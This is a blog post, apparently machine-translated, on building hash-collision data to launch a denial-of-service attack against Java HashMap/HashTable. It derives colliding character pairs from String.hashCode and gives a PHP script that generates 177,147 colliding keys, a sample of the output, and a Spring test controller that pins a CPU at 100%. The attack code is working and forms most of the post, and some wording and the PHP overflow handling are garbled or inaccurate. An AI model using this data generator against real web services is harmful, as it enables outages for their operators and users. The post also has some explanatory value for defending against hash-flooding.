Data Production of Java Hash Collision

Posted by SpectralDesign.Net on Tue, 25 Jun 2019 21:03:02 +0200

Last article An Advanced DoS Attack-Hash Collision Attack I implemented a DoS attack on Java by forging Hash Collision data. Here's how to produce a large amount of attack data.

HashTable is a very common data structure. It has fast access speed, simple structure and is deeply loved by programmers. The HashTable data structure is as follows:

Hash Function is also called hash hash function, through which we can convert various types of key s into a memory address in a finite space. Common hash functions are MD5 and SHA*. However, MD5 and SHA* algorithms are rarely used in HashTable, because these two kinds of algorithms are too time-consuming, and almost all programming languages choose Times* type algorithms, such as Times 31, Times 33, Times 37. The Hash algorithm used by Java is Times 31, and the Hash algorithm used by PHP is Times 33...

If HashTable is used properly, HashTable will be a perfect data structure. But sometimes HashTable is used abnormally, such as being attacked. Assuming that "layne" and "abbc" keys get the same memory address by hashing algorithm, our program does not know which key parameter to get. In view of this situation, we introduce the concept of Bucket (a linked list structure). When this happens, the program will store multiple data corresponding to the same memory address into the same Bucket linked list, which can solve the problem of data acquisition, but will bring additional operations. When hundreds of thousands or even millions of data hit the same Bucket, the impact on HashTable is fatal, the amount of computation will increase dramatically, and the CPU will be exhausted in minutes.

By studying HashTable hashing algorithm at the bottom of various languages, corresponding attack data can be produced, which is difficult to defend. But after we know the principle of attack, we can still cope well.

1. Implementation of Java HashCode function

Through Google, we can easily find the hash algorithm implemented by Java HashTable. In Java, there is a method called HashCode(), which we can use.

System.out.println("it2048.cn".hashCode());

At the bottom of the HashCode() function is to use the times31 algorithm. As for why to choose times31, the official saying is "31 * I == (i << 5) - i", which is faster. The source code is as follows:

/**
 * Returns a hash code for this string. The hash code for a
 * <code>String</code> object is computed as
 * <blockquote><pre>
 * s[0]*31^(n-1) + s[1]*31^(n-2) + ... + s[n-1]
 * </pre></blockquote>
 * using <code>int</code> arithmetic, where <code>s[i]</code> is the
 * <i>i</i>th character of the string, <code>n</code> is the length of
 * the string, and <code>^</code> indicates exponentiation.
 * (The hash value of the empty string is zero.)
 *
 * @return  a hash code value for this object.
 */
public int hashCode() {
    int h = hash;
    if (h == 0 && value.length > 0) {
        char val[] = value;

        for (int i = 0; i < value.length; i++) {
            h = 31 * h + val[i];
        }
        hash = h;
    }
    return h;
}

The formula of core calculation is as follows:

s[0]*31^(n-1) + s[1]*31^(n-2) + ... + s[n-1]

Through derivation and calculation, the calculation formulas are as follows:

F(n) = 31*F(n-1) + str[i]

Use PHP to implement the following (here is only to strengthen the hash hashing algorithm underlying are very simple formulas):

function hashCode($str) {  
    $h = 0;
    $len = strlen($str);
    $t = 2147483648; //Maximum value of java int
    for ($i = 0; $i < $len; $i++) {
        $h = (($h << 5) - $h) + ord($str[$i]);
        if($h > $t) $h %= $t; //Overflow moulding
    }
    return $h;
}

2. Implementing Backstepping by Java HashCode Function

Through the following formula

F(n) = 31*F(n-1) + str[i]

We can further derive the following equation:

31*x + y = 31*(x+1) + y-31 = 31*(x+2) + y-62

It is easy to find three sets of ASCII characters that satisfy the criteria, namely:

at = 97*31 + 116 = 3123

bU = 98*31 + 85 = 3123

c6 = 99*31 + 54 = 3123

From the above data, we can theoretically construct any even-digit string, such as:

  1. At atatatatatatatat (16 bits)
  2. c6atatatatatatbU (16 bits)
  3. At atatatatatatbUat (16 bits)
  4. c6c6c6c6c6c6bUat (16 bits)

As the hashCode obtained from the above 16-bit strings is the same, theoretically we can get pow(3,16/2) = 6561 strings; 22-bit length strings can get pow(3,22/2) = 177147 strings, which is sufficient to launch a simple attack. Next, we encapsulate a simple function to generate 177 147 attack strings.

3. Mass production of collision data through scripts

As we have deduced the implementation equation of the collision data, then I quickly generate the collision data through PHP. It's better not to use Java to generate collision data here, because improper operations can turn into scripts that attack themselves.

$arr_src = ['at','bU','c6']; 
$str_tmp = '';  //Storing temporary strings
$arr_rtn = [];
$t = combs(11,$arr_src,$str_tmp,$arr_rtn);
/**
 * Combination algorithm
 **/
function combs($n,$arr,$str,&$arr_rtn) {
    if($n==1){
        for($j=0;$j<3;$j++){
            $arr_rtn[$str.$arr[$j]] = 0;
        }
    }else
    {
        for($j=0;$j<3;$j++){
            combs($n-1,$arr,$str.$arr[$j],$arr_rtn);
        }
    }
}
$json = json_encode($arr_rtn);
file_put_contents('log/times31.txt',$json);

Finally, we generated the following data (intercepted the previous ones):

{
    "atatatatatatatatatatat":0,
    "atatatatatatatatatatbU":0,
    "atatatatatatatatatatc6":0,
    "atatatatatatatatatbUat":0,
    "atatatatatatatatatbUbU":0,
    "atatatatatatatatatbUc6":0,
    "atatatatatatatatatc6at":0,
    "atatatatatatatatatc6bU":0,
    "atatatatatatatatatc6c6":0,
    "atatatatatatatatbUatat":0,
    "atatatatatatatatbUatbU":0,
    "atatatatatatatatbUatc6":0,
    "atatatatatatatatbUbUat":0,
    "atatatatatatatatbUbUbU":0,
    "atatatatatatatatbUbUc6":0,
    "atatatatatatatatbUc6at":0
}

IV. Testing collision data in Java

Through the program, we generated 177147 collision data, and then did a simple test in SpringBook. The test code is as follows:

public class IndexController {

    @RequestMapping(value="/",method = RequestMethod.GET)
    public String index(){

        String jsonStr = "";
        try
        {
            FileReader fr = new FileReader("times31.txt");//File paths to read
            BufferedReader br = new BufferedReader(fr);
            jsonStr = br.readLine();
            br.close();//Close the BufferReader stream
            fr.close();     //Close the file stream
        }catch(IOException e)//Catching exceptions
        {
            System.out.println("Specified file does not exist");//Handling exceptions
        }

        Map<String, Object> map = new HashMap<String, Object>();

        map = JSONObject.fromObject(jsonStr);


        return "Hash Collision ~";
    }
}

The test results showed that a CPU was hit 100% and lasted for more than 20 minutes. Mac Pro immediately gets hot and the fan opens. After the java process is terminated, the computer is restored.

Link address of previous article: An Advanced DoS Attack-Hash Collision Attack

To be continued...

My blog - original link: Data Production of Java Hash Collision

Topics: Java PHP JSON Programming